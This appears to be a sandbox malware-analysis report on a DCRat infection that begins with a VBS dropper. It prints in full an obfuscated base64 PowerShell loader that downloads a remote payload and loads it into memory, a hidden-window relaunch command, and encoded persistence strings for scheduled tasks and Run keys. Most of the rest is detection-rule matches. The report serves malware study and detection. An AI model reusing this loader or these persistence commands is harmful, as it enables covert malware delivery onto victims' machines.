                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden -command wscript.exe //b //nologo 'C:\Users\user\AppData\Local\Temp\sostener.vbs'
                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ExeNy = 'J Bz HE YQBh Go I 9 C Jw w DE Mw n Ds J B3 Gk a Bs HY I 9 C Jw l H egBB GM TwBn Ek bgBN HI JQ n Ds WwBC Hk d Bl Fs XQBd C J Bu G4 dQBv GE I 9 C WwBz Hk cwB0 GU bQ u EM bwBu HY ZQBy HQ XQ 6 Do RgBy G8 bQBC GE cwBl DY N BT HQ cgBp G4 Zw o C K BO GU dw t E8 YgBq GU YwB0 C TgBl HQ LgBX GU YgBD Gw aQBl G4 d p C4 R Bv Hc bgBs G8 YQBk FM d By Gk bgBn Cg JwBo HQ d Bw HM Og v C8 dwB3 Hc LgBp G4 ZgBv HI bQBh GM aQBv G4 bwBw G8 cgB0 HU bgBh C4 YwBv G0 LwB3 H LQBj G8 bgB0 GU bgB0 C8 dQBw Gw bwBh GQ cw v DI M y DQ Lw w Dk LwBk Gw b Bz Gs eQBm GE b u HQ e B0 Cc KQ p Ds WwBz Hk cwB0 GU bQ u EE c Bw EQ bwBt GE aQBu F0 Og 6 EM dQBy HI ZQBu HQ R Bv G0 YQBp G4 LgBM G8 YQBk Cg J Bu G4 dQBv GE KQ u Ec ZQB0 FQ eQBw GU K n EM b Bh HM cwBM Gk YgBy GE cgB5 DE LgBD Gw YQBz HM MQ n Ck LgBH GU d BN GU d Bo G8 Z o Cc WgB4 Es S BH Cc KQ u Ek bgB2 G8 awBl Cg J Bu HU b Bs Cw I Bb G8 YgBq GU YwB0 Fs XQBd C K n HQ e B0 C4 MQBT EQ LwBT FY TgBF C8 egBy GE TQ v Gc ZQBS C8 awBh FQ Lw 5 DY MQ u DM Mw y C4 Mg w DI Lg x Dk Lw v Do c B0 HQ a n C L g CQ dwBp Gg b B2 C L g Cc XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf F8 XwBf C0 LQ t C0 LQ t C0 LQ t C0 LQ t C0 Jw s C J Bz HE YQBh Go L g Cc MQ n Cw I n FI bwBk GE Jw g Ck KQ 7 ==';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace(' ','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\user\AppData\Local\Temp\sostener.vbs');powershell $KByHL;
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FF848E5078D4_2_00007FF848E5078D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848E20F5B19_2_00007FF848E20F5B
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 19_2_00007FF848E2041D19_2_00007FF848E2041D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FF848E1340221_2_00007FF848E13402
                Source: sostener.vbsInitial sample: Strings found which are bigger than 50
                Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 4.2.powershell.exe.155dc4f0000.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 26.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 19.2.powershell.exe.240c11b51a0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 33.2.powershell.exe.1c03cb43b98.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 4.2.powershell.exe.155c41c7c80.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 33.2.powershell.exe.1c03cb40780.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 33.2.powershell.exe.1c03cb43b98.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 4.2.powershell.exe.155c41c4868.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 19.2.powershell.exe.240c11b1d88.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DcRatBy author = ditekSHen, description = Detects executables containing the string DcRatBy
                Source: 19.2.powershell.exe.240c0f59258.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 4.2.powershell.exe.155c408daf0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 33.2.powershell.exe.1c03c941ab0.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 4.2.powershell.exe.155c5369780.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 0000001A.00000002.2343267450.0000000001509000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000004.00000002.2534304751.00000155DC4F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                Source: 00000013.00000002.2417662894.00000240C11A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000004.00000002.2090885360.00000155C41C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000027.00000002.2729558667.0000000000DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000027.00000002.2794514159.0000000002C6A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 0000001A.00000002.2331186217.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 0000001A.00000002.2386589663.0000000003131000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000027.00000002.2794514159.0000000002C53000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 00000021.00000002.2793866781.000001C03CB30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 1120, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 7896, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegSvcs.exe PID: 3872, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: Process Memory Space: powershell.exe PID: 7728, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                Source: Process Memory Space: RegSvcs.exe PID: 7484, type: MEMORYSTRMatched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, Settings.csBase64 encoded string: 'rdvg6WR9YpK4ldjpOONzY1prolv9NEkpkwUs2GkgR//0YtYH71rbxnR4PfBGmKhcLHtUrWgSsu+78LWRDCPstL0LWyHbVXPesRyBf8ep2nk=', 'kavigSNbfCs4IxuRCpfhumt7bCDlfiYTnBbT8pebQJaPJb8mlJBl7LhTP3A3D1oAvA9GgjgmY82OkDe1wp1WS9wyXKoH33DKgXCHGkVhdxmVDR5O3ckPdt7AZq6A27WPZ45ZZYqJ0Q/xn4KPodqJiJV3Tjop6IJ2RAcH6E9eLR2IIauR8fzkjhfIpmJxMk+CP8AYqydzOwaR03qYahkZv3rhQlsHUWeqGeYQtjFnvewL7x93qMLeiQt6fahVgVjBmll1DTYlzCGoaCZMRzXSKcKaffC71+RasCUhGK18dCw=', 'jVe/CHyxeji+ISSX691hV54Pga5de6Nfp7sJWmdTAzHCaR7mZl2MO65Hk6KJMauS9Y6jw9wXKcqYOT2qrHh4JQ==', 'vVLVqaAyjFawc15DAD8/cfIQb0Gumvo25eyVv99u7lA+4pgQQfe5He3KVJsqW0aNW9hTCtQIhPaNPwOsYJIAxA=='
                Source: 4.2.powershell.exe.155c41c7c80.2.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, Settings.csBase64 encoded string: 'rdvg6WR9YpK4ldjpOONzY1prolv9NEkpkwUs2GkgR//0YtYH71rbxnR4PfBGmKhcLHtUrWgSsu+78LWRDCPstL0LWyHbVXPesRyBf8ep2nk=', 'kavigSNbfCs4IxuRCpfhumt7bCDlfiYTnBbT8pebQJaPJb8mlJBl7LhTP3A3D1oAvA9GgjgmY82OkDe1wp1WS9wyXKoH33DKgXCHGkVhdxmVDR5O3ckPdt7AZq6A27WPZ45ZZYqJ0Q/xn4KPodqJiJV3Tjop6IJ2RAcH6E9eLR2IIauR8fzkjhfIpmJxMk+CP8AYqydzOwaR03qYahkZv3rhQlsHUWeqGeYQtjFnvewL7x93qMLeiQt6fahVgVjBmll1DTYlzCGoaCZMRzXSKcKaffC71+RasCUhGK18dCw=', 'jVe/CHyxeji+ISSX691hV54Pga5de6Nfp7sJWmdTAzHCaR7mZl2MO65Hk6KJMauS9Y6jw9wXKcqYOT2qrHh4JQ==', 'vVLVqaAyjFawc15DAD8/cfIQb0Gumvo25eyVv99u7lA+4pgQQfe5He3KVJsqW0aNW9hTCtQIhPaNPwOsYJIAxA=='
                Source: 19.2.powershell.exe.240c11b51a0.1.raw.unpack, NormalStartup.csBase64 encoded string: 'L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g', 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA=='
